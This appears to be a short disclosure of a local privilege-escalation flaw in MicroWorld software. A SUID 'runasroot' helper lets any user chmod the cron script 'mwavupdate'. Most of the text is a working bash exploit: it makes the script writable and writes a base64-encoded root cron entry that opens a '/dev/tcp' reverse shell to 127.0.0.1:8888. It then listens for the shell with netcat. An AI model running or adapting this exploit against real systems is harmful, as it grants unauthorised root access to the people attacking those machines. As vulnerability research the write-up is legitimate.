Context:
- This software has a file
mwavupdate
which is a crontab script. It creates a symlink to/etc/cron.d
to make system run update using cronjob -
runasroot
is a SUID binary file that allows unprivileged user change permission of some certain files usingchmod
. Themwavupdate
is in the list too
→ Attacker can change permission ofmwavupdate
, overwriting the crontab by a malicious task to execute system command as root
Exploit demo that gains reverse shell (localhost)
#!/bin/bash
# Modify permission of crontab
/opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate
# Modify crontab to run malicious command
echo
"KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC
4xLzg4ODggPCYxJwo=" | base64 -d > /opt/MicroWorld/etc/mwavupdate
/opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate
nc -nvlp 8888